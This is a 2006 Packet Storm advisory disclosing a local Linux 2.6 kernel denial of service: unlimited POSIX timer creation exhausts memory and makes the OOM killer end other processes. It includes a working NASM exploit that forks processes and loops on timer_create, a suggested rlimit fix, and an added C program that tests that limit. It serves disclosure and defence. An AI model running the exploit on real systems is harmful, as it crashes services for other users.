noHeaven.txt

2006-04-19T00:00:00
ID PACKETSTORM:45601
Type packetstorm
Reporter Maciej Piotr Falkiewicz
Modified 2006-04-19T00:00:00

Description

                                        
Hello.  
I'd like to present one of the Linux kernel vulnerabilities. As far as I
know, this one affects 2.6.x kernels.
  
Problem
--

The problem lies in sys_timer_create() in linux/kernel/posix-timers.c.
Each time a user creates a POSIX timer, some kernel memory is allocated.
Since the number of timers a user can create is limited only by the
sigqueue size (e.g. 4294967295 in Debian), every local user can exhaust
all available memory, which will trigger the oom_killer (mm/oom_kill.c).
If a process itself uses only a small amount of memory, its oom_score
will be low, so all other processes would be killed.
  
Exploit  
--

--------------8<---------------------
  
;nasm -f elf noHeaven.asm  
;ld -s -o noHeaven noHeaven.o  
  
section .text  
global _start  
  
count equ 8 ; threads count - do it quicker  
  
_start:  
mov ebx, count  
call create_threads  
jmp done  
_pause:  
mov eax,29  
int 0x80  
ret  
create_threads:  
mov eax,2  
int 0x80  
test eax,eax  
jz consume  
dec ebx  
test ebx,ebx  
jnz create_threads  
ret  
consume:  
setsid: ; so we won't get counted as one thread in oom_killer()  
xor ebx,ebx ; each task will have about 20 oom_score which  
mov eax,66 ; is less than 'init' and others  
int 0x80  
push eax  
loopek:  
mov eax,259  
mov ebx,0  
mov ecx,0  
mov edx,esp  
int 0x80  
jmp loopek  
done:  
xor ebx,ebx  
mov eax,1  
int 0x80  
  
  
--------------8<--------------------
  
  
Fix
--
In my opinion the easiest way to defend is to enforce the pending signals
queue size rlimit (ulimit -i).
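
The effect of that rlimit can be verified directly. The C program below is an added example, not part of the original advisory: it lowers the soft RLIMIT_SIGPENDING (the value `ulimit -i` controls), creates a bounded number of unarmed timers through the raw timer_create syscall, and reports where the kernel refuses with EAGAIN. The function name, the 64-timer probe cap and the limit of 16 are assumptions chosen for illustration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <time.h>
#include <unistd.h>

#define PROBE_CAP 64   /* hard stop: the probe never creates more than this */

/* Lower the soft RLIMIT_SIGPENDING to `limit`, then create POSIX timers until
 * the kernel refuses. Returns the number of timers created, or -1 on an
 * unexpected error. All timers are deleted and the previous soft limit is
 * restored before returning. PROBE_CAP as a result means nothing stopped us. */
int probe_sigpending_limit(rlim_t limit, int *stop_errno)
{
    struct rlimit old, capped;
    int ids[PROBE_CAP];   /* the raw syscall returns the kernel's int timer id */
    int n = 0;

    *stop_errno = 0;
    if (limit >= PROBE_CAP || getrlimit(RLIMIT_SIGPENDING, &old) != 0)
        return -1;
    capped = old;
    capped.rlim_cur = limit;
    if (setrlimit(RLIMIT_SIGPENDING, &capped) != 0)
        return -1;

    while (n < PROBE_CAP) {
        /* NULL sigevent: default SIGALRM notification; timer is never armed */
        if (syscall(SYS_timer_create, CLOCK_REALTIME, NULL, &ids[n]) != 0) {
            *stop_errno = errno;
            break;
        }
        n++;
    }
    for (int i = 0; i < n; i++)
        syscall(SYS_timer_delete, ids[i]);
    setrlimit(RLIMIT_SIGPENDING, &old);
    return (*stop_errno == 0 || *stop_errno == EAGAIN) ? n : -1;
}

int main(void)
{
    int err, n = probe_sigpending_limit(16, &err);
    printf("timers created under limit 16: %d (stopped by errno %d)\n", n, err);
    return (n >= 0 && n <= 16 && err == EAGAIN) ? 0 : 1;
}
```

The kernel charges queued-signal slots per user, not per process, so the count can come out below the limit when the same user already holds timers or pending signals elsewhere.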
  
Vendor notification status
--
The vendor refused to fix this kind of bug.
  
  
--
Regards,  
fingerout  